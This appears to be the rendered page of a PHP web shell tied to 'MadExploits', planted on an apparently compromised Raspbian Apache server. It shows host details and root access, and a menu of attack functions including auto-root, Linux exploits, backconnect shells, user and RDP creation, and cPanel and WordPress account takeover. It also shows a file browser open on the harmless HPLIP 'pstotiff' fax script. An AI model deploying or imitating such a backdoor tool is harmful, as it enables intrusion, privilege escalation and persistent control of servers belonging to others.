Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
hplip /
fax /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
806
B
-rw-r--r--
coverpages.py
22.21
KB
-rw-r--r--
fax.py
31.45
KB
-rw-r--r--
faxdevice.py
2.57
KB
-rw-r--r--
ledmfax.py
34.01
KB
-rw-r--r--
ledmsoapfax.py
3.63
KB
-rw-r--r--
marvellfax.py
36.16
KB
-rw-r--r--
pmlfax.py
41.99
KB
-rw-r--r--
pstotiff
1.04
KB
-rw-r--r--
pstotiff.convs
778
B
-rw-r--r--
pstotiff.types
2.04
KB
-rw-r--r--
soapfax.py
28.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pstotiff
#!/usr/bin/env python import os import os.path import time import sys import tempfile PY3 = sys.version_info[0] == 3 READ_SIZE = 8192 total_bytes_read = 0 temp_in_file = "-" if (len(sys.argv) > 6): temp_in_file = sys.argv[6] temp_out_handle, temp_out_fname = tempfile.mkstemp() font = "-I/usr/share/cups/fonts" device = "-sDEVICE=tiffg4 -dMaxStripSize=0 -r204x196 -dNOPAUSE -dBATCH -dSAFER -dPARANOIDSAFER -dSHORTERRORS -dWRITESYSTEMDICT -dGHOSTSCRIPT -sstdout=%stderr -sOutputFile=" + temp_out_fname + " " + temp_in_file gs_command = "/usr/bin/gs" + " " + font + " " + device exit_code = os.system(gs_command) file_len = os.stat(temp_out_fname).st_size if (file_len < READ_SIZE): READ_SIZE = file_len os.close(temp_out_handle) out_handle = open(temp_out_fname, mode='rb') while (total_bytes_read < file_len): data = out_handle.read(READ_SIZE) if PY3: sys.stdout.buffer.write(data) else: sys.stdout.write(data) total_bytes_read += READ_SIZE out_handle.close() os.remove(temp_out_fname) sys.exit(0)
Close